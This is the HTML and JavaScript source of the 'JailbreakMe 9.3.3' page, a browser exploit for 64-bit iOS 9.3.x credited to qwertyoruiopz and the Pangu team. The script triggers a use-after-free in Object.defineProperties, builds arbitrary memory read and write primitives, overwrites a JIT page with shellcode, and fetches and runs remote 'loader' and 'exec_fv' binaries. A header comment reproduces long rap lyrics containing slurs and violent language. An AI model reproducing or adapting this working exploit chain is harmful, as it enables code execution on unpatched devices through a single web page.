jbme 9.3.3 qwertyoruiop.com

jbme.html

<!--
 
 This is licensed under the Anyone But Stefan Esser license.
 
 ---
 
 PLZ NO RCE.
 
 sorry 4 indentation but i was using nano lmao

 ---

 The game of chess, is like a sword fight
 You must think first, before you move
 Wu style is immensely strong, and immune to nearly any weapon
 When it's properly used, it's almost invincible
 
 Raw I'ma give it to ya, with no trivia
 Raw like cocaine straight from Bolivia
 My hip hop will rock and shock the nation
 Like the Emancipation Proclamation
 Weak MC's approach with slang that's dead
 You might as well run into the wall and bang your head
 I'm pushin' force, my force your doubtin'
 I'm makin' devils cower to the Caucus Mountains
 
 Well I'm a sire, I set the microphone on fire
 Rap styles vary, and carry like Mariah
 I come from the shaolin slum, and the isle I'm from
 Is comin' through with nuff niggas, and nuff guns
 So if you want to come sweatin', stressin' contesting
 You'll catch a sharp sword to the midsection
 Don't talk the talk, if you can't walk the walk
 Phony niggas are outlined in chalk
 A man vexed, is what the projects made me
 Rebel to the grain there's no way to barricade me
 Steam-rollin' niggas with the eighteen wheeler
 With the drunk driver drivin', there's no survivin'
 
 Ruff like Timberland wear, yeah
 Me and the Clan, and yo the Landcruisers out there
 Peace to all the crooks, all the niggas with bad looks
 Bald heads, braids, blow this hook
 We got chrome tecs, nickel plated macs
 Black axe, drug dealin' styles in phat stacks
 I only been a good nigga for a minute though
 'Cause I got to get my props, and win it yo
 I got beef wit commercial-ass niggas with gold teeth
 Lampin' in a Lexus eatin' beef
 Straight up and down don't even bother
 I got forty niggas up in here now, who kill niggas fathers
 
 My peoples are you with me where you at?
 In the front, in the back killa-bees on attack
 My peoples are you with me where you at?
 Smokin meth hittin caps on the block with the gats
 
 Here I go, deep type flow
 Jacque Cousteau could never get this low, I'm
 Cherry bombin' shits boom!
 Just warmin' up a little bit, vroom vroom
 Rappinin is what's happenin'
 Keep the pockets stacked and then, hands clappin' and
 At the party when I move my body
 Gotta get up, and be somebody
 Grab the microphone put strength to the bone
 Duh, duh, duh enter the Wu-Tang zone
 Sure enough when I rock that stuff
 Huff puff I'm gonna catch your bluff tuff
 Rough, kickin' rhymes like Jim Kelly
 Or Alex Haley I'm a Mi Beetle Bailey rhymes
 Comin' raw style, hardcore
 Niggas be comin' to the hip-hop store
 Comin' to buy grocery from me
 Tryin' to be a hip-hop MC
 The law, in order to enter the Wu-Tang
 You must bring the Ol Dirty Bastard type slang
 Represent the Gza, Abbot, RZA, Shaquan, Inspecta Deck
 Dirty hoe gettin' low wit his flow
 Introducin' the Ghostface Killer
 No one could get illa
 
 My peoples are you with me where you at?
 In the front, in the back killa-bees on attack
 My peoples are you with me where you at?
 Smokin meth hittin caps on the block with the gats
 
 Speakin' of the devil psych, no it's the God, get the shit right
 Mega trife, and yo I killed you in a past life
 On the mic while you was kickin' that fast shit
 You reneged tried again, and got blasted
 Half mastered ass style mad ruff task
 When I struck I had on Tims and a black mask
 Remember that shit? I know you don't remember jack
 That night yo I was hittin' like a spiked bat
 And then you thought I was bugged out, and crazy
 Strapped for nonsense, after me became lazy
 Yo, nobody budge while I shot slugs
 Never shot thugs, I'm runnin' with thugs that flood mugs
 So grab your eight plus one, start flippin' and trippin'
 Niggas is jettin' I'm lickin' off son
 
 Wu, Tang, Wu, Tang, Wu, Tang, Wu, Tang!
 
 Homicide's illegal and death is the penalty
 What justifies the homicide, when he dies?
 In his own iniquity it's the
 Master of the Mantis Rapture comin at cha
 We have an APB on an MC Killer
 Look like the work of a Master
 Evidence indicates that's it's stature
 Merciless like a terrorist hard to capture
 The flow changes like a chameleon
 Plays like a friend, and stabs you like a dagger
 This technique attacks the immune system
 Disguised like a lie paralyzin' the victim
 You scream, as it enters your bloodstream
 Erupts your brain from the pain these thoughts contain
 Movin' on a nigga with the speed of a centipede
 And injure any motherfuckin' contender
 
 My peoples are you with me where you at?
 In the front, in the back killa-bees on attack
 My peoples are you with me where you at? 
 Smokin meth hittin caps on the block with the gats  

 ---
 
 Shaolin shadowboxing, and the Wu-Tang sword style
 If what you say is true,
 The Shaolin and the Wu-Tang could be dangerous
 Do you think your Wu-Tang sword can defeat me?
 
 En garde, I'll let you try my Wu-Tang style
 
 Bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 Bring da mother, bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 
 Ghostface, catch the blast of a hype verse
 My glock bursts, leave in a hearse, I did worse
 I come rough, tough like an elephant tusk
 Ya head rush, fly like Egyptian musk
 Aw shit, Wu-Tang Clan spark the wicks an'
 However, I master the trick just like Nixon
 Causin' terror, quick damage ya whole era
 Hardrocks is locked the fuck up, or found shot
 P.L.O. style, hazardous, cause I wreck this dangerous
 I blow sparks like Waco, Texas
 
 I watch my back like I'm locked down, hardcore
 Hittin' sound, watch me act bugged, and tear it down
 A literate type asshole, songs goin' gold, no doubt
 And you watch a corny nigga fold
 Yeah, they fake and all that
 Carryin' gats but yo, my Clan
 Rollin like forty Macs
 Now ya act convinced, I guess it makes sense
 Wu-Tang, yo sew, represent
 I wait for one to act up
 Now I got him backed up
 Gun to his neck now, react what?
 And that's one in the chamber
 Wu-Tang banger, 36 styles of danger
 
 Bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 Bring da mother, bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 
 I rip it hardcore, like porno-flick bitches
 I roll with groups of ghetto bastards with biscuits
 Check it, my method on the microphone's bangin'
 Wu-Tang slang'll leave your headpiece hangin'
 Bust this, I'm kickin' like Segal, Out For Justice
 The roughness, yes, the rudeness, ruckus
 Redrum, I verbally assault with the tongue
 Murder one, my style shot ya knot like a stun-gun
 I'm hectic, I wreck it with the quickness
 Set it on the microphone, and competition get blown
 By this nasty ass nigga with my nigga, the RZA
 Charged like a bull and got pull like a trigga
 So bad, stabbin' up the pad with the vocab, crab
 I scream on ya ass like your dad, bring it on
 
 Bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 Bring da mother, bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 
 Yo, I'm more rugged than slave man boots
 New recruits, I'm fuckin' up MC troops
 I break loops, and trample shit, while I stomp!
 A mud hole in that ass, cause I'm straight out the swamp
 Creepin' up on site, now it's Fright Night
 My Wu-Tang slang is mad fuckin' dangerous
 And more deadly than the stroke of an axe
 Choppin' through ya back swish
 Givin' bystanders heart-attacks
 Niggas try to flip, tell me who is him
 I blow up his fuckin' prism
 Make it a vicious act of terrorism
 You want to bring it, so fuck it
 Come on and bring the ruckus
 And I provoke niggaz to kick buckets
 I'm wettin' cream, I ain't wettin' fame
 Who sellin' gain, I'm givin' out a deadly game
 It's not the Russian it's the Wu-Tang crushin'
 Roulette, slip up and get fucked like Suzette
 Bring da fuckin' ruckus
 
 Bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 Bring da mother, bring da motherfuckin' ruckus
 Bring da motherfuckin' ruckus
 
 So bring it on
 So bring it on
 So bring it on
 So bring it on
 So bring it on
 So bring it on
 So bring it on
 
 Punk nigga!
 
--!>
 <html manifest="off.appcache">
 <head>
 <title>JailbreakMe 9.3.3</title>
 <meta name="viewport" content="user-scalable=1.0,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
 <meta name="apple-mobile-web-app-capable" content="no">
 <meta name="format-detection" content="telephone=no">
 <link rel="apple-touch-icon" href="touch-icon-iphone.png">
 <meta name="apple-mobile-web-app-title" content="JailbreakMe" />
<style>
 body {
 overflow: hidden;
 position: fixed;
 position: relative;
 }
 h1{
 overflow: hidden;
 position: fixed;
 position: absolute;
 top: 40%;
 left: 50%;
 transform: translate(-50%, -50%);
 }

footer {
    position: absolute;
    left: 0;
    bottom: 0;
    height: 40px;
    width: 100%;
    overflow:hidden;
}

 </style>
</head>
 <body>
<script>
 function load_binary_resource(url) {
 	var req = new XMLHttpRequest();
 	req.open('GET', url, false);
 	req.overrideMimeType('text\/plain; charset=x-user-defined');
 	req.send(null);
 	if (req.status != 200) {
 		document.write("fail downloading loader");
 		stop = 1
 	};
 	return req.responseText;
 }
 var mem0 = 0;
 var mem1 = 0;
 var mem2 = 0;

 function read4(addr) {
 	mem0[4] = addr;
 	var ret = mem2[0];
 	mem0[4] = mem1;
 	return ret;
 }

 function write4(addr, val) {
 	mem0[4] = addr;
 	mem2[0] = val;
 	mem0[4] = mem1;
 }
 filestream = load_binary_resource("exec_fv")
 var shll = new Uint32Array(filestream.length / 4);
 for (var i = 0; i < filestream.length;) {
 	var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
 	shll[i / 4] = word;
 	i += 4;
 }
 var print = alert;
 _dview = null;

 function u2d(low, hi) {
 	if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 	_dview.setUint32(0, hi);
 	_dview.setUint32(4, low);
 	return _dview.getFloat64(0);
 }
 var pressure = new Array(100);
 var bufs = new Array(10000);
 dgc = function() {
 	for (var i = 0; i < pressure.length; i++) {
 		pressure[i] = new Uint32Array(0x10000);
 	}
 	for (var i = 0; i < pressure.length; i++) {
 		pressure[i] = 0;
 	}
 }

 function swag() {
 	if (bufs[0]) return;
 	dgc();
 	dgc();
 	dgc();
 	dgc();
 	dgc();
 	dgc();
 	dgc();
 	dgc();
 	for (i = 0; i < bufs.length; i++) {
 		bufs[i] = new Uint32Array(0x100 * 2)
 		for (k = 0; k < bufs[i].length;) {
 			bufs[i][k++] = 0x41414141;
 			bufs[i][k++] = 0xffff0000;
 		}
 	}
 }
 var trycatch = "";
 for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
 var fc = new Function(trycatch);
 var fcp = 0;
 var smsh = new Uint32Array(0x10)

 function smashed(stl) {
 	document.body.innerHTML = "win! " + smsh.length;
 	var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
 	write4(jitf, 0xd28024d0);
 	write4(jitf + 4, 0x58000060);
 	write4(jitf + 8, 0xd4001001);
 	write4(jitf + 12, 0xd65f03c0);
 	write4(jitf + 16, jitf + 0x20);
 	write4(jitf + 20, 1);
 	fc();
 	var dyncache = read4(jitf + 0x20);
 	var dyncachev = read4(jitf + 0x20);
 	var go = 1;
 	while (go) {
 		if (read4(dyncache) == 0xfeedfacf) {
 			for (i = 0; i < 0x1000 / 4; i++) {
 				if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
 				{
 					go = 0;
 					break;
 				}
 			}
 		}
 		dyncache += 0x1000;
 	}
 	dyncache -= 0x1000;
 	var bss = [];
 	var bss_size = [];
 	for (i = 0; i < 0x1000 / 4; i++) {
 		if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
 			bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
 			bss_size.push(read4(dyncache + i * 4 + (0x28)));
 		}
 	}
 	var shc = jitf;
 	var filestream = load_binary_resource("loader")
 	for (var i = 0; i < filestream.length;) {
 		var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
 		write4(shc, word);
 		shc += 4;
 		i += 4;
 	}
 	jitf &= ~0x3FFF;
 	jitf += 0x8000;
 	write4(shc, jitf);
 	write4(shc + 4, 1);
 	// copy macho
        for (var i = 0; i < shll.length; i++) {
                if(shll[i] == 0x44556677) {
                        var k=new ArrayBuffer(8*6);
                        var k8=new Uint8Array(k);
                        var k32=new Uint32Array(k);
                        var str=prompt("Real build number:", "13F69");
                        for(var si=0; si<str.length; si++) k8[si] = str.charCodeAt(si);
                        for(var si=0; si<k32.length; si++) shll[i+si] = k32[si];
			break;
                }
        }
        for (var i = 0; i < shll.length; i++) {
                if(shll[i] == 0x33553377) {
                        var k=new ArrayBuffer(8*6);
                        var k8=new Uint8Array(k);
                        var k32=new Uint32Array(k);
                        var str=prompt("Real version:", "9.3.2");
                        for(var si=0; si<str.length; si++) k8[si] = str.charCodeAt(si);
                        for(var si=0; si<k32.length; si++) shll[i+si] = k32[si];
			break;
                }
        }
        for (var i = 0; i < shll.length; i++) {
                write4(jitf + i * 4, shll[i]);
        }

 	alert("All set. Close this alert and lock your screen to continue. See you on the other side!")
 	for (var i = 0; i < bss.length; i++) {
 		for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
 			write4(bss[i] + k * 4, 0);
 		}
 	}
 	fc();
 	alert(2);
 }

 function go() {
 	document.body.innerHTML = "<center><h1>doing it</h1>by <a href='https://twitter.com/qwertyoruiopz'>qwertyoruiopz</a> & <a href='http://pangu.io'>pangu team</a>, for iOS 9.3.x<br />may take multiple tries, 64 bit only<br />tyvm NSO, sick 0day (at the time)</center>";
	dgc();
 	setTimeout(go_, 400);
 }

 function go_() {
 	if (smsh.length != 0x10) {
 		smashed();
 		return;
 	}
 	dgc();
 	var arr = new Array(0x100);
 	var yolo = new ArrayBuffer(0x1000);
 	arr[0] = yolo;
 	arr[1] = 0x13371337;
 	var not_number = {};
 	not_number.toString = function() {
 		arr = null;
 		props["stale"]["value"] = null;
 		swag();
 		return 10;
 	};
 	var props = {
 		p0: {
 			value: 0
 		},
 		p1: {
 			value: 1
 		},
 		p2: {
 			value: 2
 		},
 		p3: {
 			value: 3
 		},
 		p4: {
 			value: 4
 		},
 		p5: {
 			value: 5
 		},
 		p6: {
 			value: 6
 		},
 		p7: {
 			value: 7
 		},
 		p8: {
 			value: 8
 		},
 		length: {
 			value: not_number
 		},
 		stale: {
 			value: arr
 		},
 		after: {
 			value: 666
 		}
 	};
 	var target = [];
 	var stale = 0;
 	var before_len = arr.length;
 	Object.defineProperties(target, props);
 	stale = target.stale;
 	stale[0] += 0x101;
 	stale[1] = {}
 	for (var z = 0; z < 0x1000; z++) fc();
 	for (i = 0; i < bufs.length; i++) {
 		for (k = 0; k < bufs[0].length; k++) {
 			if (bufs[i][k] == 0x41414242) {
 				stale[0] = fc;
 				fcp = bufs[i][k];
 				stale[0] = {
 					'a': u2d(105, 0x1172600),
 					'b': u2d(0, 0),
 					'c': smsh,
 					'd': u2d(0x100, 0)
 				}
 				stale[1] = stale[0]
 				bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
 				bck = stale[0][4];
 				stale[0][4] = 0; // address, low 32 bits
 				// stale[0][5] = 1; // address, high 32 bits == 0x100000000
 				stale[0][6] = 0xffffffff;
 				mem0 = stale[0];
 				mem1 = bck;
 				mem2 = smsh;
 				bufs.push(stale)
 				if (smsh.length != 0x10) {
 					smashed(stale[0]);
 				}
 				return;
 			}
 		}
 	}
 	document.location.reload();
 }

 </script>



<center><a href="javascript:go()"><h1>go</h1></a>by <a href='https://twitter.com/qwertyoruiopz'>qwertyoruiopz</a> & <a href='http://pangu.io'>pangu team</a>, for iOS 9.3.x<br />may take multiple tries, 64 bit only<br />tyvm NSO, sick 0day (at the time)</center>
<footer><center><a href="cydia://url/https://cydia.saurik.com/api/share#?source=https://jbme.qwertyoruiop.com">Add repo for 'jbmepatch', a tweak that fixes this vulnerability.</a></center></footer>
</body>
</html>